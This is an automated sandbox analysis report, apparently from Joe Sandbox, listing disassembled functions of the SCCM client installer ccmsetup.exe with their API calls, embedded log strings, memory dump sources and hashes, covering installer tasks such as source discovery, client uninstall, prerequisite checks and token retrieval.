                                                                                          • CcmSetup::FindAvailableSource, xrefs: 00586344
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586676
                                                                                          • WaitForRetry(), xrefs: 00586671
                                                                                          • CheckForAvailableSources(itStart,sSourceDir, bPreviousSourceAccessible,bPreviousSource,bFoundSource,true), xrefs: 005864A7
                                                                                          • FindAvailableSource failed with error 0x%x, xrefs: 00586758
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058654A
                                                                                          • Determining source location..., xrefs: 00586431
                                                                                          • Found accessible source: %s, xrefs: 005866BD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005864AC
                                                                                          • ccmsetup.cpp, xrefs: 00586687
                                                                                          • CheckForAvailableSources(itStart,sSourceDir,bPreviousSourceAccessible,bPreviousSource,bFoundSource,false), xrefs: 00586545
                                                                                          • Failed to find an available source., xrefs: 0058658F
                                                                                          • ((m_oSourceDirs.size() > 0) || (m_oFQDNSourceDirs.size() > 0)), xrefs: 0058639F
                                                                                          • No sources defined, xrefs: 005863D9
                                                                                          • ccmsetup.cpp, xrefs: 0058666B
                                                                                          • \_j, xrefs: 005863C9
                                                                                          • ccmsetup.cpp, xrefs: 005863B1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005863A4
                                                                                          • Failed to find accessible source. Waiting for retry., xrefs: 0058662E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$_rand$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$((m_oSourceDirs.size() > 0) || (m_oFQDNSourceDirs.size() > 0))$CcmSetup::FindAvailableSource$CheckForAvailableSources(itStart,sSourceDir, bPreviousSourceAccessible,bPreviousSource,bFoundSource,true)$CheckForAvailableSources(itStart,sSourceDir,bPreviousSourceAccessible,bPreviousSource,bFoundSource,false)$Determining source location...$Failed to find accessible source. Waiting for retry.$Failed to find an available source.$Failed to find new accessible source. Retrying previous source.$FindAvailableSource failed with error 0x%x$Found accessible source: %s$Found available source %s$No sources defined$WaitForRetry()$\_j$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 4254737775-3107171301
                                                                                          • Opcode ID: ba6bb32223abf09a663232a97955a24beae000f58727b0b6154ee40e9acc3e49
                                                                                          • Instruction ID: f892500b43d039a8e5ab5afaba63b964256bea5cf276d909428e7971957fc4d6
                                                                                          • Opcode Fuzzy Hash: ba6bb32223abf09a663232a97955a24beae000f58727b0b6154ee40e9acc3e49
                                                                                          • Instruction Fuzzy Hash: F1C19D71D04359AADF20EFA4C84ABEDBFBABF45300F144059E904BB282DBB45A49CF51
                                                                                          Function 0058C2CC Relevance: 54.5, APIs: 5, Strings: 26, Instructions: 270threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058C2D6
                                                                                            • Part of subcall function 005BB745: __EH_prolog3_catch_GS.LIBCMT ref: 005BB74C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C33F
                                                                                            • Part of subcall function 0058AE97: __EH_prolog3.LIBCMT ref: 0058AE9E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C3B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C491
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C4F6
                                                                                          Strings
                                                                                          • CcmSetup::HandleOldClientUninstall, xrefs: 0058C2F2
                                                                                          • ccm, xrefs: 0058C5B9
                                                                                          • {252DA259-82CA-4177-B8D0-49C78937BA3E}, xrefs: 0058C42F
                                                                                          • ccmsetup.cpp, xrefs: 0058C3C0
                                                                                          • ccmsetup.cpp, xrefs: 0058C4FE
                                                                                          • ccmsetup.cpp, xrefs: 0058C499
                                                                                          • ShouldCurrentClientBeUninstalled( sMinimumUpgradableVersion, bShouldUninstallClient ), xrefs: 0058C335
                                                                                          • Namespace root\ccm exists but SCCM client or MP/MCS/PullDP is not installed. Clear the namespace in case it's not cleaned up prope, xrefs: 0058C58D
                                                                                          • UninstallRelatedProducts( c_szClientUpgradeCode, m_sMsiUninstallLogFile.length() > 0 ? m_sMsiUninstallLogFile : m_sMsiLogFile, (m_, xrefs: 0058C487
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C3B3
                                                                                          • ccmsetup.cpp, xrefs: 0058C347
                                                                                          • ccmsetup.cpp, xrefs: 0058C32F
                                                                                          • (*it)(this), xrefs: 0058C3AE
                                                                                          • CCM hosted server application is detected, xrefs: 0058C644
                                                                                          • ccmsetup.cpp, xrefs: 0058C4E6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C4F1
                                                                                          • IsClientInstalled(bClientInstalled), xrefs: 0058C4EC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C48C
                                                                                          • ccmsetup.cpp, xrefs: 0058C3A8
                                                                                          • k%, xrefs: 0058C3EC
                                                                                          • Failed to clear root\ccm namespace with error 0x%x, xrefs: 0058C5F6
                                                                                          • root, xrefs: 0058C5A2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C33A
                                                                                          • ccmsetup.cpp, xrefs: 0058C481
                                                                                          • root\ccm, xrefs: 0058C54C
                                                                                          • A newer version client is being installed over an old client and uninstalling old client is necessary. Uninstalling the old clien, xrefs: 0058C3F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(*it)(this)$A newer version client is being installed over an old client and uninstalling old client is necessary. Uninstalling the old clien$CCM hosted server application is detected$CcmSetup::HandleOldClientUninstall$Failed to clear root\ccm namespace with error 0x%x$IsClientInstalled(bClientInstalled)$Namespace root\ccm exists but SCCM client or MP/MCS/PullDP is not installed. Clear the namespace in case it's not cleaned up prope$ShouldCurrentClientBeUninstalled( sMinimumUpgradableVersion, bShouldUninstallClient )$UninstallRelatedProducts( c_szClientUpgradeCode, m_sMsiUninstallLogFile.length() > 0 ? m_sMsiUninstallLogFile : m_sMsiLogFile, (m_$ccm$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$k%$root$root\ccm${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 133077043-3291407230
                                                                                          • Opcode ID: fc144284efbd8772e3b1779e55b192052e17121eacbf786e5d37ad6f7044c1fc
                                                                                          • Instruction ID: 6e7e408e5cda3297f8d3d8269ade1bef87eb137bfb29a8404f86000d7e329d50
                                                                                          • Opcode Fuzzy Hash: fc144284efbd8772e3b1779e55b192052e17121eacbf786e5d37ad6f7044c1fc
                                                                                          • Instruction Fuzzy Hash: 20A1D271D40259AEDF10EBA4C81AFEEBFB9BF45700F148059F9087B282DB745A46CB64
                                                                                          Function 005813D1 Relevance: 54.5, APIs: 10, Strings: 21, Instructions: 235threadsleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005813D8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00581462
                                                                                          • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,032FCCBC), ref: 005814AD
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,032FCCBC), ref: 005814B7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005814EC
                                                                                          • Sleep.KERNEL32(000003E8,00000001,00000000,00000000,?,?,ccmsetup.exe), ref: 0058155D
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,032FCCBC), ref: 0058156F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005815FD
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,032FCCBC), ref: 00581621
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005816C2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ErrorLast$DeleteEventFileH_prolog3_catch_ResetSleep
                                                                                          • String ID: tk$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Attempt to delete %s failed (0x%x)$CcmSetup::DownloadCcmsetup$DeleteFileW(sDestPath)$DownloadFileBySMB( g_pSetupEnv->GetModuleFullPath(), false, true, false, true, sDestPath, 0 )$GetServiceExecutionMutex()$ResetEvent(m_shCcmsetupServiceEvent)$Successfully deleted existing %s$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.exe
                                                                                          • API String ID: 88874183-4229826525
                                                                                          • Opcode ID: 14057ad4e932aaa005ee070aad647707126dd68ca51e1637aefa8a0717f8327d
                                                                                          • Instruction ID: 40cf5921854974c38f559153a61a5442a03cbaf4658ddc5f1e93e519c165c38d
                                                                                          • Opcode Fuzzy Hash: 14057ad4e932aaa005ee070aad647707126dd68ca51e1637aefa8a0717f8327d
                                                                                          • Instruction Fuzzy Hash: 1F8115B1E40719EAEF10EBA4CD4ABEE7EA9BF50B04F044015F901BB2C2D7B45945CBA5
                                                                                          Function 0059C214 Relevance: 54.4, APIs: 7, Strings: 24, Instructions: 183threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0059C21B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C297
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C304
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C355
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C3C5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C40E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C45E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::ServiceCtrlHandler$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$g_pCcmSetup->OnPowerEvent(uEventType, pEventData)$g_pCcmSetup->Pause()$g_pCcmSetup->Resume()$g_pCcmSetup->Stop()$g_pCcmSetup->Stop()
                                                                                          • API String ID: 3454896115-3257362122
                                                                                          • Opcode ID: 19685e6505e09d3b186acaef768e813dac419aaa281b4406d50620dfef6e7c08
                                                                                          • Instruction ID: 9e69f47dadda14ee92d0fe8b2d010c6e7ab565c161b5a765db0f5464a342a1df
                                                                                          • Opcode Fuzzy Hash: 19685e6505e09d3b186acaef768e813dac419aaa281b4406d50620dfef6e7c08
                                                                                          • Instruction Fuzzy Hash: DE512BB1A58B16ABCF20AB608D4BD7F7E65BF82F50F198015F405A73C2CA645D01DFA0
                                                                                          Function 00585383 Relevance: 52.8, APIs: 4, Strings: 26, Instructions: 293threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005853B4
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005A72A4: __EH_prolog3_catch_GS.LIBCMT ref: 005A72AE
                                                                                            • Part of subcall function 005A72A4: GetCurrentThreadId.KERNEL32 ref: 005A73C9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00585426
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00585516
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005855F8
                                                                                          Strings
                                                                                          • ,aj, xrefs: 005857CB
                                                                                          • x64/client.msi, xrefs: 00585595
                                                                                          • Zj, xrefs: 005856E8
                                                                                          • Some client prerequisites were not installed., xrefs: 005857D9
                                                                                          • setupManifest.DiscoverOrderedInstallList(), xrefs: 005853AA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005853AF
                                                                                          • hrRes, xrefs: 005855EE
                                                                                          • ccmsetup.cpp, xrefs: 0058542E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00585511
                                                                                          • \Wj, xrefs: 005856AE
                                                                                          • ccmsetup.cpp, xrefs: 00585416
                                                                                          • The client prerequisite '%s' was found to be be missing but a reboot may be pending. Ignoring this prerequisite for now., xrefs: 0058574C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00585421
                                                                                          • i386/client.msi, xrefs: 00585580
                                                                                          • <\j, xrefs: 00585737
                                                                                          • The client prerequisite '%s' was found to be missing. But IgnoreFailure flag is defined. , xrefs: 005856C3
                                                                                          • ccmsetup.cpp, xrefs: 00585506
                                                                                          • setupManifest.GetInstallInfo( iIndex, sFileName, sParams, installType, arrSuccessReturnCodes, &bImpactClientState, 0, &bIgnoreFail, xrefs: 0058550C
                                                                                          • ccmsetup.cpp, xrefs: 0058551E
                                                                                          • The client prerequisite '%s' was found to be missing., xrefs: 005856FD
                                                                                          • setupManifest.GetInstallListCount( iInstallCount ), xrefs: 0058541C
                                                                                          • ccmsetup.cpp, xrefs: 005855E8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005855F3
                                                                                          • ccmsetup.cpp, xrefs: 005853A4
                                                                                          • ccmsetup.cpp, xrefs: 00585600
                                                                                          • ccmsetup.cpp, xrefs: 005853BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$,aj$<\j$Some client prerequisites were not installed.$The client prerequisite '%s' was found to be be missing but a reboot may be pending. Ignoring this prerequisite for now.$The client prerequisite '%s' was found to be missing.$The client prerequisite '%s' was found to be missing. But IgnoreFailure flag is defined. $\Wj$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$hrRes$i386/client.msi$setupManifest.DiscoverOrderedInstallList()$setupManifest.GetInstallInfo( iIndex, sFileName, sParams, installType, arrSuccessReturnCodes, &bImpactClientState, 0, &bIgnoreFail$setupManifest.GetInstallListCount( iInstallCount )$x64/client.msi$Zj
                                                                                          • API String ID: 3353525418-6844956
                                                                                          • Opcode ID: b3b1aed8bbd146cc07f1f36ab8d64c6ae0ae49420e7cd680d91ca37d6bdf4b89
                                                                                          • Instruction ID: 282fe29d0957cecd7e40a2cc25a904aaed1de65d15daf38436343db659780d13
                                                                                          • Opcode Fuzzy Hash: b3b1aed8bbd146cc07f1f36ab8d64c6ae0ae49420e7cd680d91ca37d6bdf4b89
                                                                                          • Instruction Fuzzy Hash: 83C18F30E05258EADB20EB64CD4ABDDBFB4AF56704F1480C9E54977182DBB45B88CF62
                                                                                          Function 0065A133 Relevance: 52.8, APIs: 6, Strings: 24, Instructions: 252threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0065A13D
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A259
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A2BC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A360
                                                                                            • Part of subcall function 0065BC6C: __EH_prolog3_catch_GS.LIBCMT ref: 0065BC73
                                                                                            • Part of subcall function 0065BC6C: EnterCriticalSection.KERNEL32(?,CCM::Authentication::CEncryptedTokenCache::GetToken,00000070,0065A1F8,?,0070E88C,S-1-5-18,?,00000000,000000FF,CCM::Authentication::CCcmTokenMgr::GetToken,00000090,00659DB5,0070E8B0,00000008,00000000), ref: 0065BCC6
                                                                                            • Part of subcall function 0065BC6C: GetCurrentThreadId.KERNEL32 ref: 0065BD08
                                                                                            • Part of subcall function 0065BC6C: LeaveCriticalSection.KERNEL32(?,?,00000008,CCM::Authentication::CEncryptedTokenCache::GetToken,00000070,0065A1F8,?,0070E88C,S-1-5-18,?,00000000,000000FF,CCM::Authentication::CCcmTokenMgr::GetToken,00000090,00659DB5,0070E8B0), ref: 0065BD2A
                                                                                            • Part of subcall function 0065BEF0: __EH_prolog3_catch_GS.LIBCMT ref: 0065BEF7
                                                                                            • Part of subcall function 0065BEF0: GetCurrentThreadId.KERNEL32 ref: 0065BF79
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A3B6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A423
                                                                                          Strings
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A350
                                                                                          • Security::GetSidStringFromCurrentProcess(sUserSid), xrefs: 0065A2B2
                                                                                          • Failed to get user sid. Error 0x%x, xrefs: 0065A2F2
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A261
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A41E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A254
                                                                                          • RetrieveTokenFromStsServer(szPotentialServerUrl, sAADToken, sCcmToken, ulExpiresIn), xrefs: 0065A356
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A3A6
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A368
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A42B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A3B1
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A2AC
                                                                                          • g_cacheEncryptedTokens.SetToken(sActualUserSid, sCcmToken, ulExpiresIn), xrefs: 0065A3AC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A2B7
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A413
                                                                                          • g_cacheEncryptedTokens.SetToken(sUserSid, sCcmToken, ulExpiresIn), xrefs: 0065A419
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A35B
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A249
                                                                                          • CcmUtilLib::CcmGetAADToken(sActualUserSid, sAADToken, sAADUserId), xrefs: 0065A24F
                                                                                          • }, xrefs: 0065A2E7
                                                                                          • CCM::Authentication::CCcmTokenMgr::GetToken, xrefs: 0065A191
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A2C5
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A3BE
                                                                                          • S-1-5-18, xrefs: 0065A1CD, 0065A3CE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$CriticalSection$EnterH_prolog3Leave
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$CCM::Authentication::CCcmTokenMgr::GetToken$CcmUtilLib::CcmGetAADToken(sActualUserSid, sAADToken, sAADUserId)$Failed to get user sid. Error 0x%x$RetrieveTokenFromStsServer(szPotentialServerUrl, sAADToken, sCcmToken, ulExpiresIn)$S-1-5-18$Security::GetSidStringFromCurrentProcess(sUserSid)$g_cacheEncryptedTokens.SetToken(sActualUserSid, sCcmToken, ulExpiresIn)$g_cacheEncryptedTokens.SetToken(sUserSid, sCcmToken, ulExpiresIn)$}
                                                                                          • API String ID: 3602753738-1313536212
                                                                                          • Opcode ID: 79e79b7276087695c1a9867b75c46018a0e14122083c3c2ee5277e346705f15a
                                                                                          • Instruction ID: 53c5f4f13d508902c419426984c4afc4302a5156eb3fa574ff837d1cd9b78047
                                                                                          • Opcode Fuzzy Hash: 79e79b7276087695c1a9867b75c46018a0e14122083c3c2ee5277e346705f15a
                                                                                          • Instruction Fuzzy Hash: 9991D271D40218AADF20EBE4CC4ABEE7EB9BB50700F148159F510F7382DB785A49CB62
                                                                                          Function 00625161 Relevance: 52.7, APIs: 7, Strings: 23, Instructions: 226threadencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00625168
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006251D9
                                                                                            • Part of subcall function 0062238D: __EH_prolog3_catch.LIBCMT ref: 00622394
                                                                                            • Part of subcall function 0062238D: GetCurrentThreadId.KERNEL32 ref: 006223F4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00625238
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062527B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006252CA
                                                                                          • CertCompareCertificateName.CRYPT32(00000001,?,00000000), ref: 006252FC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062535A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
